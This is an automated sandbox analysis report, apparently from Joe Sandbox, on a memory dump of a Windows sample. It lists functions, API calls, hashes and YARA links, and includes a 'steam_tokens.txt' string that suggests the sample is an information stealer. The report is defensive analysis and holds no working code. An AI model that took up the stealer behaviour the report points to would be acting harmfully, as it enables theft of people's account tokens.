Source File: 00000000.00000002.2442165197.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2442165197.000000000043C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2442165197.000000000046A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2442165197.0000000000493000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2442165197.000000000049F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2442165197.00000000004C4000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2442165197.00000000004D1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2442165197.00000000004F1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2442165197.00000000004FD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2442165197.0000000000500000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2442165197.0000000000587000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2442165197.00000000005A7000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2442165197.00000000005AD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2442165197.000000000063E000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_file.jbxd

Similarity

API ID: Heap$Process$Alloc$Closewsprintf$NameOpenlstrcpy$InformationLocal$CurrentInfoKeyboardLayoutListLocaleProcess32StatusSystemTimeUser__aulldivlstrcatlstrlen$ChangeComputerCreateDefaultDirectoryEnumErrorFileFindFirstFreeGlobalHandleLastLogicalMemoryModuleNextNotificationPowerProcessorQuerySnapshotToolhelp32ValueVolumeWindowsWow64Zone
String ID:
API String ID: 869194160-0
Opcode ID: 8c10811ed08e10ffecaef0e3c5d03d79f324f342d8bbd9bc463e182b1703cee6
Instruction ID: a9f6d0abc10a802bc737c54d14ff6b9d5e6ee0272f4c656d6212d3eaa4757419
Opcode Fuzzy Hash: 8c10811ed08e10ffecaef0e3c5d03d79f324f342d8bbd9bc463e182b1703cee6
Instruction Fuzzy Hash: 8472A071851018AACB19FB91DC96EDEB33CAF24314F5042DFB51762051EF782B98CB6A

Function 00406C30 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 66memoryCOMMON

Download Yara Rule

APIs

VirtualProtect.KERNEL32(E9FC458B,087400FC,00000040,00000040), ref: 00406CEF

Strings

@, xrefs: 00406CC9

Memory Dump Source

Source File: 00000000.00000002.2442165197.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2442165197.000000000043C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2442165197.000000000046A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2442165197.0000000000493000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2442165197.000000000049F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2442165197.00000000004C4000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2442165197.00000000004D1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2442165197.00000000004F1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2442165197.00000000004FD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2442165197.0000000000500000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2442165197.0000000000587000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2442165197.00000000005A7000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2442165197.00000000005AD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2442165197.000000000063E000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_file.jbxd

Similarity

API ID: ProtectVirtual
String ID: @
API String ID: 544645111-2766056989
Opcode ID: 867edc3f7feb9bd756791c0b70ce9cc7864d6ccfd6d1b0176bf07496b986d28b
Instruction ID: a97aeec014860b7bcefe5a819602e0a11eb2ce5ea612e9d10357849f9a661301
Opcode Fuzzy Hash: 867edc3f7feb9bd756791c0b70ce9cc7864d6ccfd6d1b0176bf07496b986d28b
Instruction Fuzzy Hash: 3E213174A04208EFEB04CF89D544BAEBBB1FF48304F1181AAD456AB381D3799A91DF85

Function 00406D90 Relevance: 3.2, APIs: 2, Instructions: 157COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2442165197.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2442165197.000000000043C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2442165197.000000000046A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2442165197.0000000000493000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2442165197.000000000049F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2442165197.00000000004C4000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2442165197.00000000004D1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2442165197.00000000004F1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2442165197.00000000004FD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2442165197.0000000000500000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2442165197.0000000000587000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2442165197.00000000005A7000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2442165197.00000000005AD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2442165197.000000000063E000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_file.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f8b28877c224b251f10175a9abca519b7fa48fc2f12a49a1c36a71eedd802e18
Instruction ID: 456806d1e879ecad470b616e27b80e03465aa0a519357bc85acbc9acecad2077
Opcode Fuzzy Hash: f8b28877c224b251f10175a9abca519b7fa48fc2f12a49a1c36a71eedd802e18
Instruction Fuzzy Hash: 116127B4900209DFCB14DF94E944BEEB7B0BB48304F1185AAE80677380D779AEA5DF95

Function 00414BE0 Relevance: 3.0, APIs: 1, Strings: 1, Instructions: 40stringCOMMON

Download Yara Rule

APIs

Part of subcall function 0041A110: lstrcpy.KERNEL32(00420ADA,00000000), ref: 0041A158

Part of subcall function 0041A1F0: lstrlenA.KERNEL32(00000000,?,?,00415634,00420AC3,00420AC2,?,?,004165B6,00000000,?,02716658,?,004210DC,?,00000000), ref: 0041A1FB
Part of subcall function 0041A1F0: lstrcpy.KERNEL32(00420ADA,00000000), ref: 0041A255

lstrlenA.KERNEL32(00000000,00000000,00420AB3,?,?,?,?,?,?,00415BEB,?), ref: 00414C0A

Strings

steam_tokens.txt, xrefs: 00414C1F

Memory Dump Source

Source File: 00000000.00000002.2442165197.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2442165197.000000000043C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2442165197.000000000046A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2442165197.0000000000493000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2442165197.000000000049F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2442165197.00000000004C4000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2442165197.00000000004D1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2442165197.00000000004F1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2442165197.00000000004FD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2442165197.0000000000500000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2442165197.0000000000587000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2442165197.00000000005A7000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2442165197.00000000005AD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2442165197.000000000063E000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_file.jbxd

Similarity

API ID: lstrcpylstrlen
String ID: steam_tokens.txt
API String ID: 2001356338-401951677
Opcode ID: 3e6e8c4ec68da8a60059a0c307bac8cddf5291aabd55d5ca038adbf108d907ef
Instruction ID: 43ba9c4e7b772c09295c3d1ddd3f4580462a4fb142283e9dc1187fbec7936fd0
Opcode Fuzzy Hash: 3e6e8c4ec68da8a60059a0c307bac8cddf5291aabd55d5ca038adbf108d907ef
Instruction Fuzzy Hash: 48F01271D1110876CB04F7B2EC579ED733CAE54358F90426EF41662092EF78665886AB

Function 00417970 Relevance: 3.0, APIs: 2, Instructions: 34COMMON

Download Yara Rule

APIs

GetSystemInfo.KERNEL32(00420DFC), ref: 004179A0
wsprintfA.USER32 ref: 004179B6

Memory Dump Source

Source File: 00000000.00000002.2442165197.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2442165197.000000000043C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2442165197.000000000046A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2442165197.0000000000493000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2442165197.000000000049F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2442165197.00000000004C4000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2442165197.00000000004D1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2442165197.00000000004F1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2442165197.00000000004FD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2442165197.0000000000500000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2442165197.0000000000587000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2442165197.00000000005A7000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2442165197.00000000005AD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2442165197.000000000063E000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_file.jbxd

Similarity

API ID: InfoSystemwsprintf
String ID:
API String ID: 2452939696-0
Opcode ID: b67a8d3803bdbcef095136fe51fb218f504635533fc880d72ddeb760f53951d8
Instruction ID: e5f7882cf5308591a3a92d8d4ad10ccbd8a019f3ce2acafa6204cd8ee8253483
Opcode Fuzzy Hash: b67a8d3803bdbcef095136fe51fb218f504635533fc880d72ddeb760f53951d8
Instruction Fuzzy Hash: 2DF0C2B1A00618EBCB10CF88ED45FAAB7BDFB08724F50066AF50492280D7785904CB94

Function 0040B370 Relevance: 2.9, APIs: 2, Instructions: 387stringCOMMON

Download Yara Rule

APIs

Part of subcall function 0041A110: lstrcpy.KERNEL32(00420ADA,00000000), ref: 0041A158

Part of subcall function 0041A380: lstrlenA.KERNEL32(?,004210E0,?,00000000,00420ADA), ref: 0041A395
Part of subcall function 0041A380: lstrcpy.KERNEL32(00000000), ref: 0041A3D4
Part of subcall function 0041A380: lstrcat.KERNEL32(00000000,00000000), ref: 0041A3E2

Part of subcall function 0041A2F0: lstrcpy.KERNEL32(00000000,?), ref: 0041A342
Part of subcall function 0041A2F0: lstrcat.KERNEL32(00000000), ref: 0041A352

Part of subcall function 0041A270: lstrcpy.KERNEL32(?,00420ADA), ref: 0041A2D5

Part of subcall function 00409E60: memcmp.MSVCRT ref: 00409E7B
Part of subcall function 00409E60: memset.MSVCRT ref: 00409EAE
Part of subcall function 00409E60: LocalAlloc.KERNEL32(00000040,?), ref: 00409EFE

lstrlenA.KERNEL32(00000000), ref: 0040B820
lstrlenA.KERNEL32(00000000), ref: 0040B834

Part of subcall function 0041A170: lstrcpy.KERNEL32(?,00000000), ref: 0041A1B6

Memory Dump Source

Source File: 00000000.00000002.2442165197.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2442165197.000000000043C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2442165197.000000000046A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2442165197.0000000000493000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2442165197.000000000049F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2442165197.00000000004C4000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2442165197.00000000004D1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2442165197.00000000004F1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2442165197.00000000004FD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2442165197.0000000000500000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2442165197.0000000000587000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2442165197.00000000005A7000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2442165197.00000000005AD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2442165197.000000000063E000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_file.jbxd

Similarity

API ID: lstrcpy$lstrlen$lstrcat$AllocLocalmemcmpmemset
String ID:
API String ID: 4023347672-0
Opcode ID: 1671589ca2fb4529a8c41e26df04db147d9ff983bb6a5733586af9eb644caa22
Instruction ID: 12fecfe212cb7392b3f17e260ebd7fbbf5924c22592aec839546a7360daeb2af
Opcode Fuzzy Hash: 1671589ca2fb4529a8c41e26df04db147d9ff983bb6a5733586af9eb644caa22
Instruction Fuzzy Hash: 5DE12272911118ABCB14EBA1CC96EEE7339BF14314F40415EF507721A1EF786B98CB6A

Function 0040AD70 Relevance: 2.7, APIs: 2, Instructions: 236stringCOMMON

Download Yara Rule

APIs

Part of subcall function 0041A110: lstrcpy.KERNEL32(00420ADA,00000000), ref: 0041A158

Part of subcall function 0041A380: lstrlenA.KERNEL32(?,004210E0,?,00000000,00420ADA), ref: 0041A395
Part of subcall function 0041A380: lstrcpy.KERNEL32(00000000), ref: 0041A3D4
Part of subcall function 0041A380: lstrcat.KERNEL32(00000000,00000000), ref: 0041A3E2

Part of subcall function 0041A2F0: lstrcpy.KERNEL32(00000000,?), ref: 0041A342
Part of subcall function 0041A2F0: lstrcat.KERNEL32(00000000), ref: 0041A352

Part of subcall function 0041A270: lstrcpy.KERNEL32(?,00420ADA), ref: 0041A2D5

lstrlenA.KERNEL32(00000000), ref: 0040AFEA
lstrlenA.KERNEL32(00000000), ref: 0040AFFE

Part of subcall function 0041A170: lstrcpy.KERNEL32(?,00000000), ref: 0041A1B6

Memory Dump Source

Source File: 00000000.00000002.2442165197.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2442165197.000000000043C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2442165197.000000000046A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2442165197.0000000000493000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2442165197.000000000049F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2442165197.00000000004C4000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2442165197.00000000004D1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2442165197.00000000004F1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2442165197.00000000004FD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2442165197.0000000000500000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2442165197.0000000000587000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2442165197.00000000005A7000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2442165197.00000000005AD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2442165197.000000000063E000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_file.jbxd

Similarity

API ID: lstrcpy$lstrlen$lstrcat
String ID:
API String ID: 2500673778-0
Opcode ID: 29b90eca7756a2368e2cff1b18191de2d53f54d778e3d8cba51b3810482dd1a5
Instruction ID: 4b138641442dd51730d9762ac92e0d5652ebadbf156882a2c3fe3545aa946475
Opcode Fuzzy Hash: 29b90eca7756a2368e2cff1b18191de2d53f54d778e3d8cba51b3810482dd1a5
Instruction Fuzzy Hash: 98915572911108ABCF14FBA1DC96EEE7339AF54314F40416EF40772191EF786A98CB6A

Function 0040B0B0 Relevance: 2.7, APIs: 2, Instructions: 205stringCOMMON

Download Yara Rule

APIs

Part of subcall function 0041A110: lstrcpy.KERNEL32(00420ADA,00000000), ref: 0041A158

Part of subcall function 0041A380: lstrlenA.KERNEL32(?,004210E0,?,00000000,00420ADA), ref: 0041A395
Part of subcall function 0041A380: lstrcpy.KERNEL32(00000000), ref: 0041A3D4
Part of subcall function 0041A380: lstrcat.KERNEL32(00000000,00000000), ref: 0041A3E2

Part of subcall function 0041A2F0: lstrcpy.KERNEL32(00000000,?), ref: 0041A342
Part of subcall function 0041A2F0: lstrcat.KERNEL32(00000000), ref: 0041A352

Part of subcall function 0041A270: lstrcpy.KERNEL32(?,00420ADA), ref: 0041A2D5

lstrlenA.KERNEL32(00000000), ref: 0040B2AE
lstrlenA.KERNEL32(00000000), ref: 0040B2C2

Part of subcall function 0041A170: lstrcpy.KERNEL32(?,00000000), ref: 0041A1B6

Memory Dump Source

Source File: 00000000.00000002.2442165197.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2442165197.000000000043C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2442165197.000000000046A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2442165197.0000000000493000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2442165197.000000000049F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2442165197.00000000004C4000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2442165197.00000000004D1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2442165197.00000000004F1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2442165197.00000000004FD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2442165197.0000000000500000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2442165197.0000000000587000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2442165197.00000000005A7000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2442165197.00000000005AD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2442165197.000000000063E000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_file.jbxd

Similarity

API ID: lstrcpy$lstrlen$lstrcat
String ID:
API String ID: 2500673778-0
Opcode ID: 71037ea0268480dfb44e3431275103f795aa2c431327dccfa3f4e5da4cc02ff5
Instruction ID: d2f8e92f06f21ad00195b851541a0fca05b03a5e78dc2554d63ff73f5d8ac6c5
Opcode Fuzzy Hash: 71037ea0268480dfb44e3431275103f795aa2c431327dccfa3f4e5da4cc02ff5
Instruction Fuzzy Hash: A9717371911108ABCF14FBA1DC56EEE7339BF54314F40412EF403A2191EF786A58CBAA

Function 004066B0 Relevance: 2.6, APIs: 2, Instructions: 95memoryCOMMON

Download Yara Rule

APIs

VirtualAlloc.KERNEL32(00406E0E,00406E0E,00003000,00000040), ref: 00406756
VirtualAlloc.KERNEL32(00000000,00406E0E,00003000,00000040), ref: 004067A3

Memory Dump Source

Source File: 00000000.00000002.2442165197.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2442165197.000000000043C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2442165197.000000000046A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2442165197.0000000000493000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2442165197.000000000049F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2442165197.00000000004C4000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2442165197.00000000004D1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2442165197.00000000004F1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2442165197.00000000004FD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2442165197.0000000000500000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2442165197.0000000000587000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2442165197.00000000005A7000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2442165197.00000000005AD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2442165197.000000000063E000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_file.jbxd

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: badb7cecddd27d9e1aa55144c1fc7f4ba9690274eb5e83060997e099dbd08bd4
Instruction ID: 4499aa19cc86b02a1bac446f32e864e245a0bde13e44bf0a480e22725e368a89
Opcode Fuzzy Hash: badb7cecddd27d9e1aa55144c1fc7f4ba9690274eb5e83060997e099dbd08bd4
Instruction Fuzzy Hash: 2B41F334A00208EFCB44CF58C494BADBBB1FF44314F1486A9E94AAB385C735EA91CF84

Function 00414B30 Relevance: 2.5, APIs: 2, Instructions: 48stringCOMMON

Download Yara Rule

APIs

Part of subcall function 00418880: SHGetFolderPathA.SHELL32(00000000,?,00000000,00000000,?,?,000003E8), ref: 004188AB

lstrcat.KERNEL32(?,00000000), ref: 00414B6A
lstrcat.KERNEL32(?,02739A40), ref: 00414B88

Part of subcall function 004143F0: wsprintfA.USER32 ref: 0041440C
Part of subcall function 004143F0: FindFirstFileA.KERNEL32(?,?), ref: 00414423

Memory Dump Source

Source File: 00000000.00000002.2442165197.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2442165197.000000000043C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2442165197.000000000046A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2442165197.0000000000493000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2442165197.000000000049F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2442165197.00000000004C4000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2442165197.00000000004D1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2442165197.00000000004F1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2442165197.00000000004FD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2442165197.0000000000500000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2442165197.0000000000587000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2442165197.00000000005A7000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2442165197.00000000005AD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2442165197.000000000063E000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_file.jbxd

Similarity

API ID: lstrcat$FileFindFirstFolderPathwsprintf
String ID:
API String ID: 2699682494-0
Opcode ID: ea26987b4423f50a717eb4a0c73cf79a460df56b31a43226088b2649255c0623
Instruction ID: 3c3433cccd63aeccdbe2a936e698fd88f8205579aacfd307105c0296dbc1629e
Opcode Fuzzy Hash: ea26987b4423f50a717eb4a0c73cf79a460df56b31a43226088b2649255c0623
Instruction Fuzzy Hash: 8B01967690021C67CB24FB60DC46EDE733C9B64304F40415EBA4A57191FEB8AAC98BE5

Function 004010A0 Relevance: 2.5, APIs: 2, Instructions: 41memoryCOMMON

Download Yara Rule

APIs

VirtualAlloc.KERNEL32(00000000,17C841C0,00003000,00000004,?,?,?,0040114E,?,?,004164BC), ref: 004010B3
VirtualFree.KERNEL32(00000000,17C841C0,00008000,00000000,05E69EC0,?,?,?,0040114E,?,?,004164BC), ref: 004010F7

Memory Dump Source

Source File: 00000000.00000002.2442165197.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2442165197.000000000043C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2442165197.000000000046A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2442165197.0000000000493000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2442165197.000000000049F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2442165197.00000000004C4000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2442165197.00000000004D1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2442165197.00000000004F1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2442165197.00000000004FD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2442165197.0000000000500000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2442165197.0000000000587000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2442165197.00000000005A7000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2442165197.00000000005AD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2442165197.000000000063E000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_file.jbxd

Similarity

API ID: Virtual$AllocFree
String ID:
API String ID: 2087232378-0
Opcode ID: f9d4902d87d53e064eb978b4b4efccb4618282ab89b9805507bbfbdb43c54504
Instruction ID: f48f966fb8dbc32d8d9482a6eca9c47ea769ab036d71d5fa6551aa32425d7b68
Opcode Fuzzy Hash: f9d4902d87d53e064eb978b4b4efccb4618282ab89b9805507bbfbdb43c54504
Instruction Fuzzy Hash: 62F02771641218BBE7149BA4AD49FAFB7DCE705B08F304459F940E3390D5719F00DA64

Function 00418830 Relevance: 1.5, APIs: 1, Instructions: 24COMMON

Download Yara Rule

APIs

GetFileAttributesA.KERNEL32(00000000,?,0040FF57,?,00000000,?,00000000,00420D97,00420D96), ref: 0041883F

Memory Dump Source

Source File: 00000000.00000002.2442165197.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2442165197.000000000043C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2442165197.000000000046A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2442165197.0000000000493000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2442165197.000000000049F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2442165197.00000000004C4000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2442165197.00000000004D1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2442165197.00000000004F1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2442165197.00000000004FD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2442165197.0000000000500000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2442165197.0000000000587000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2442165197.00000000005A7000.00000040.00000001.01000000.00000003.sdmpDownload File
